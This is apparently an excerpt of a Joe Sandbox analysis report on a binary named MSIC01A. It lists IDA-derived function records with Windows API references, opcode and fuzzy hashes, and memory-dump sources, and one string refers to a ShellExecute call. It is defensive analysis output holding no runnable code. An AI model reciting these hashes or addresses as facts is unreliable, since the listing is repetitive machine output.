                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                        • String ID: 0123456789-$0123456789-
                                                                                                                                                                        • API String ID: 3042121994-2494171821
                                                                                                                                                                        • Opcode ID: 27f7c835d171a199d0f042743ebe58a30f6c6798dc8101efd9cd38ef720cfe0f
                                                                                                                                                                        • Instruction ID: cecde9125e7e3cfa0a36df8de3dc3db020ab7bbfd15ee8bb21767f96f719afc4
                                                                                                                                                                        • Opcode Fuzzy Hash: 27f7c835d171a199d0f042743ebe58a30f6c6798dc8101efd9cd38ef720cfe0f
                                                                                                                                                                        • Instruction Fuzzy Hash: 20416031900209EFCF15DFA8D881A9EBBB5FF04311F10415AF911AB252DB78EA56EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4838D
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C62
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C7F
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C9C
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocchr.LIBCPMT ref: 00F41CAE
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocchr.LIBCPMT ref: 00F41CC1
                                                                                                                                                                        • _Mpunct.LIBCPMT ref: 00F4841A
                                                                                                                                                                        • _Mpunct.LIBCPMT ref: 00F48434
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                                                        • String ID: $+xv
                                                                                                                                                                        • API String ID: 2939335142-1686923651
                                                                                                                                                                        • Opcode ID: 7a2c779a3cb2b2f6b5aa8af2cd014203532827df31e86dabc1accd721eff4ee7
                                                                                                                                                                        • Instruction ID: f24b0a4dfc089d9566e4eca7936ad263c0d43bb3a44311fb9058e45d565ea81f
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a2c779a3cb2b2f6b5aa8af2cd014203532827df31e86dabc1accd721eff4ee7
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C21F1B1904B926ED725DF74C88073FBEF8BB08300F04455AE899C7A42E774E602DBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Mpunct$H_prolog3
                                                                                                                                                                        • String ID: $+xv
                                                                                                                                                                        • API String ID: 4281374311-1686923651
                                                                                                                                                                        • Opcode ID: 8934cd6abe708d8b655b3ef7acc631d6d46fa9bb854c90df332c502863164ade
                                                                                                                                                                        • Instruction ID: ac532c6f11010835a42350df73408fa4b64664fd3fdc90570d0618161d166cb7
                                                                                                                                                                        • Opcode Fuzzy Hash: 8934cd6abe708d8b655b3ef7acc631d6d46fa9bb854c90df332c502863164ade
                                                                                                                                                                        • Instruction Fuzzy Hash: F021C4B1904B916FD725DF74C89073BBEF8BB08301F04451AE999C7A42D774E605DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00F31434,?,00000000), ref: 00F32569
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00F31434,?,00000000), ref: 00F32589
                                                                                                                                                                        • LocalFree.KERNEL32(?,00F31434,?,00000000), ref: 00F325DF
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,72A902E8,?,00000000,00F73C40,000000FF,00000008,?,?,?,?,00F31434,?,00000000), ref: 00F32633
                                                                                                                                                                        • LocalFree.KERNEL32(?,72A902E8,?,00000000,00F73C40,000000FF,00000008,?,?,?,?,00F31434), ref: 00F32647
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree$CloseHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1291444452-0
                                                                                                                                                                        • Opcode ID: 41660260f6e16f608965e44b89eb4a02bbad5e3b65bfaf37cb75fb47b89ecb59
                                                                                                                                                                        • Instruction ID: 1bfaee2b16ca559256b916dcd73eb7b7666b362cd68129e9b42a9195b1353669
                                                                                                                                                                        • Opcode Fuzzy Hash: 41660260f6e16f608965e44b89eb4a02bbad5e3b65bfaf37cb75fb47b89ecb59
                                                                                                                                                                        • Instruction Fuzzy Hash: 81410C72604315DBC3549F38DC54B6ABBD8EF45370F14462AF526C72D1DB30DA44A761
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(72A902E8,?,00000000,?), ref: 00F71DFE
                                                                                                                                                                          • Part of subcall function 00F6A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F66F5E,?,00000000,-00000008), ref: 00F6AA67
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F72059
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F720A1
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F72144
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                        • Opcode ID: dc52b70407b3530c503efbac714fa2aa5a1be0346276ab47c6e502d564d61190
                                                                                                                                                                        • Instruction ID: 1ebd0443a59dd02368c1f56b2e39931c3434b3839a7dd53c979297beda20b427
                                                                                                                                                                        • Opcode Fuzzy Hash: dc52b70407b3530c503efbac714fa2aa5a1be0346276ab47c6e502d564d61190
                                                                                                                                                                        • Instruction Fuzzy Hash: 19D167B5E002489FCF15CFA8D880AEDBBB5FF09310F18856AE919EB351D730A945DB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 838279627-0
                                                                                                                                                                        • Opcode ID: 8de32893033c4aa8a30317422f35b14b25312b395a7fc743aad291e7e8de3ba6
                                                                                                                                                                        • Instruction ID: 878013b9e121ccb323f48127e7629b30524b415d2c0d415a1d24df552a57af1c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8de32893033c4aa8a30317422f35b14b25312b395a7fc743aad291e7e8de3ba6
                                                                                                                                                                        • Instruction Fuzzy Hash: 34B158B5D00259AFDF11DF98C880AEEBFB9FF48310F144019EC45AB255D734AA46EBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 838279627-0
                                                                                                                                                                        • Opcode ID: ebc73e0cb02c06783f44a6d4cff1fb7072313b76dd14fbe0f89d5ca4b4ee8d8b
                                                                                                                                                                        • Instruction ID: d85d6e9940e51748d50853d228a541b4930e162b454601d8b36db6261378ef86
                                                                                                                                                                        • Opcode Fuzzy Hash: ebc73e0cb02c06783f44a6d4cff1fb7072313b76dd14fbe0f89d5ca4b4ee8d8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 16B14971D002499FDF14DF98D981AEEBBB9FF48360F144019E805AB216D774AE46EBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                        • Opcode ID: 67e0a475e04ee23df7f3a4eae830039db8f0caf2b9c2e49d0d256c1c71dc5c63
                                                                                                                                                                        • Instruction ID: 4e7a896a1eb56ec2a6f64ff6dd0d5bf53f600f637a7f772e8b8a34264af098ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 67e0a475e04ee23df7f3a4eae830039db8f0caf2b9c2e49d0d256c1c71dc5c63
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F510472A00B06AFDB298F14D865B7A77A4EF84B22F140529EE0187191E735EC88E790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d0883ba410d08fdd8a47573d11a26782b9cd9e748b109fd7b88bb52a84f4f53d
                                                                                                                                                                        • Instruction ID: 5b60c134e48aa666d064ccd2316f3e4625f1690cb1f6a659a31ef2937f0a6bf8
                                                                                                                                                                        • Opcode Fuzzy Hash: d0883ba410d08fdd8a47573d11a26782b9cd9e748b109fd7b88bb52a84f4f53d
                                                                                                                                                                        • Instruction Fuzzy Hash: 8221DE32A04A06AF9B70AF64DCA1D6B77A8BF443707144525FD1697251EB31ED00B7A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00F36FB7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                        • API String ID: 1452528299-1781106413
                                                                                                                                                                        • Opcode ID: e4582b050b0be5e301728f9d8afe9e3999da51116443416b728b68f435d97325
                                                                                                                                                                        • Instruction ID: f8b8eea32ebf6cef2e6be5ee4157b2699c9c25ba081d3b1394509c518eb086a0
                                                                                                                                                                        • Opcode Fuzzy Hash: e4582b050b0be5e301728f9d8afe9e3999da51116443416b728b68f435d97325
                                                                                                                                                                        • Instruction Fuzzy Hash: 11218089E1032183CB342F38940137AB6E1EF54B64F64446FE8C8D7381FBA98C82A391
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,72A902E8), ref: 00F3CD1C
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD3C
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD6D
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD86
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3604237281-0
                                                                                                                                                                        • Opcode ID: 1de43d87c10c7c047214c3987c5ac1e079799c57da2b548337e44d4427c0871d
                                                                                                                                                                        • Instruction ID: ca00524f1b4480b7dca37352666c4e1355cbd74009fd05837f146745bb7a51dd
                                                                                                                                                                        • Opcode Fuzzy Hash: 1de43d87c10c7c047214c3987c5ac1e079799c57da2b548337e44d4427c0871d
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B21B170A45319EBD7209F54DC09FAEBBB8FB05B24F104229F514B72C0D7B06A0497E5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F3D7EE
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D7F8
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3D849
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D869
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 879590e698ff652cfcdb3d1ded0f80c047a36b27e7b3abef8d7233cd5944c0a3
                                                                                                                                                                        • Instruction ID: 6ae7f02dd7f50d3918596b03e10b1187ac622cc423c27ee80cd310f24b00a388
                                                                                                                                                                        • Opcode Fuzzy Hash: 879590e698ff652cfcdb3d1ded0f80c047a36b27e7b3abef8d7233cd5944c0a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E01D631D00619DFCB15FB64EC426BE7BA1AF40770F240449F9006B2D1CF78AE01A791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F427A9
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F427B3
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42804
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42824
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: fc3c9ceedacc7679168e700b1e22e505c8643a1d0c747089e59a08e1e299701b
                                                                                                                                                                        • Instruction ID: a1f5129ee5b432a0563599b4d7998b4819e2ef715f2e01ffb841606d9e54bf11
                                                                                                                                                                        • Opcode Fuzzy Hash: fc3c9ceedacc7679168e700b1e22e505c8643a1d0c747089e59a08e1e299701b
                                                                                                                                                                        • Instruction Fuzzy Hash: E801C431900219DBCB05EBA49C416BE7B61BF84720F240459FE046B3D2CF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F3D759
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D763
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3D7B4
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D7D4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42714
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4271E
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4276F
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4278F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F428D3
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F428DD
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4292E
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4294E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4283E
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42848
